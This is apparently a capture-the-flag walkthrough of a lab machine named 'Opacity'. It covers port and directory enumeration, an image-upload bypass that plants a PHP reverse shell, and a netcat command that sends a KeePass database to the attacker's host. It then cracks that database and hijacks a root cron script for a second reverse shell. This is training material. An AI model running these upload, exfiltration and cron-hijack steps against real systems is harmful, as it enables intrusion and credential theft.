Enumeration
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-25 11:11 BSTNmap scan report for 10.10.87.188
Host is up (0.022s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
|_ 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-25T10:11:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds
Port 80 open with Apache 2.4.41 running
SMB running
Login box at port 80
More enumeration!
└─$ smbclient -L \\\\10.10.87.188
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))
not much without authentication for SMB
└─$ smbmap -H 10.10.87.188
[+] IP: 10.10.87.188:445 Name: 10.10.87.188
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
START_TIME: Tue Apr 25 11:30:03 2023
URL_BASE: http://10.10.87.188/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.87.188/ ----
==> DIRECTORY: http://10.10.87.188/cloud/
The cloud directory looks interesting!
We can try to upload things!
Exploitation
Whilst dirb was running in the background it also found http://10.10.87.188/cloud/images/ , at an assumption this is where the uploaded images are stored.
I hosted a server and tried to upload a shell using https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php . It didn't like this as it had to be an image.
I tried with just a space and then the .jpg, didn't work, using a null character #.jpg worked and we had a shell.. for a time. The 5 minutes file upload meant you only have 5 minutes until the files are deleted.
$ lsbin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
$ whoami
www-data
$ cd home
$ ls
sysadmin
$ cd sysadmin
$ ls
local.txt
scripts
$ cat local.txt
cat: local.txt: Permission denied
We have a second user, sysadmin, we want this one!
www-data doesn't have much access, there is a scripts folder but we don't have permissions for that, but we do have access to opt and there is an interesting file in there called dataset.kdbx. A kdbx file is a keepass database, we want this!
After some hunting I found we can transfer files using netcat (nc). To do this, on the destination host (our attack box) we want to listen for the file
Example: nc -l -p 7555 > myfile.txtUsed: nc -lnvp 4446 > dataset.kdbx
On the source host (victim) we send the file:
Example: nc 10.1.1.2 7555 < myfile.txt
Used: nc 10.9.3.226 4446 < dataset.kdbx
We now have the file! Let's crack it.
Following the guide from https://www.thedutchhacker.com/how-to-crack-a-keepass-database-file/ we can pull out the hash using keepass2john and then crack the password.
keepass2john dataset.kdbx > hash.txt
Take the cracked password, open the database, get the new creds.
Remember, SSH is open, let's go get our first flag!
PrivEsc
Now we're on the machine without a time limit we can take a breath and think of the next step. Under the sysadmin there is a script.php which is the script used to delete the files found within the images folder.. this does run every 5 minutes and could be useful. There are a bunch of php files under the lib directory.
sysadmin@opacity:~/scripts$ ls -lhatotal 16K
drwxr-xr-x 3 root root 4.0K Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4.0K Feb 22 08:16 ..
drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php
Hello... the script is owned by root... but we can't edit :(
After a little, okay a lot, of thinking, we know root is running the script, we know there is a job to run the script.php from the scripts folder. What if we just make a new script which is a reverse shell? Let's give it ago, using the same script as before we can load that into a new scripts folder (moving/renaming the old one) call it script.php, set up the listener and wait....
Boom, it worked! From here we can get the final flag!
Really fun machine this one, luckily my brain has a small capacity and I totally forgot about SMB which wasn't required. The folder being cleared out stumped me for a while until the penny dropped and getting root being as simple as it was tripped me!
